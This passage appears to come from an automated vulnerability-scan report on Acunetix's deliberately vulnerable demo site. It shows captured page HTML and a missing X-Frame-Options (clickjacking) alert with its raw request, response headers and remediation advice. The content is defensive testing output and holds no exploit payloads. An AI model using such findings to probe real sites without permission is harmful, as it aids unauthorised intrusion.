          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmNkZGTLo6VVRRdQACEbfKXC37R1sHPpoA==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK30rH2AgK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q9jwc/cRnTJwdNTwN8SPSTaigKqpw==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:37:35 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently,                            therefore it is not recommended that the same beta version                            is used for more than 30 days. To beta-test beyond 30                            days, users should install the latest beta version or,                            if available, use the release version.</p>                           <p><strong>About Acunetix Web Vulnerability Scanner</strong><br />                           Acunetix Web Vulnerability Scanner, a unique web application                            scanning product that makes securing one&rsquo;s website                            easier than ever. Acunetix Web Vulnerability Scanner                            is an automated web application security testing tool                            that crawls an entire website and attacks it so as to                            identify potential weaknesses before hackers do. Further                            information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Frame-Options
          Solution

          Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.

        13. GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0
          Alert tags
          Alert description

          X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

          Request
          Request line and header section (342 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 22752
          
          
          Response body (22752 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhd